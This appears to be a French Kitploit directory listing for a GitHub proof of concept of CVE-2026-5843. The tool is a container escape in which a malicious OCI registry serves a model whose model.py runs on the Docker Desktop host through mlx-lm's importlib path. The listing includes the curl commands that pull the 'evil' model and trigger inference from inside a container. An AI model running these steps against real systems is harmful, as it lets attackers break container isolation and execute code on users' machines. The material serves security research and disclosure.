Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-5843 — POC d'évasion de conteneur Docker via mlx-metal importlib | Kitploit
Outils/GitHubGitHub/davidrxchester/cve-2026-5843
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationRed TeamingDéveloppement de Charges UtilesÉvasion de ConteneurSécurité de l'IA
GitHubdavidrxchester/cve-2026-5843

CVE-2026-5843

POC d'évasion de conteneur Docker via mlx-metal importlib

Voir le dépôt
16il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-5843 PoC

Registre OCI minimal qui sert un modèle malveillant pour exploiter le chemin d'exécution importlib de model_file dans mlx-lm. Lorsque Docker Model Runner charge le modèle pour l'inférence, model.py s'exécute sur l'hôte en tant qu'utilisateur connecté.

Prérequis : Docker Desktop ≤ 4.70.x (Apple Silicon) avec Model Runner activé

Utilisation

# 1. Start the registry on the host
python3 poc_cve_2026_5843.py

# 2. From any container on the Docker network
docker run -it --rm curlimages/curl sh

curl -X POST http://model-runner.docker.internal/api/pull \
  -H 'Content-Type: application/json' \
  -d '{"name":"localhost:5555/evil/model:latest"}'

curl --max-time 120 -X POST http://model-runner.docker.internal/engines/mlx/v1/chat/completions \
  -H 'Content-Type: application/json' \
  -d '{"model":"localhost:5555/evil/model:latest","messages":[{"role":"user","content":"hi"}]}'

La sortie est écrite dans ~/Desktop/mlx.txt sur l'hôte.

Analyse complète : https://davidrochester.com/posts/container-escape-via-inference

CVE associées

  • CVE-2026-5817 — vllm-metal trust_remote_code=True, même surface d'attaque, corrigée dans Docker Desktop 4.68.0
Télécharger l’outil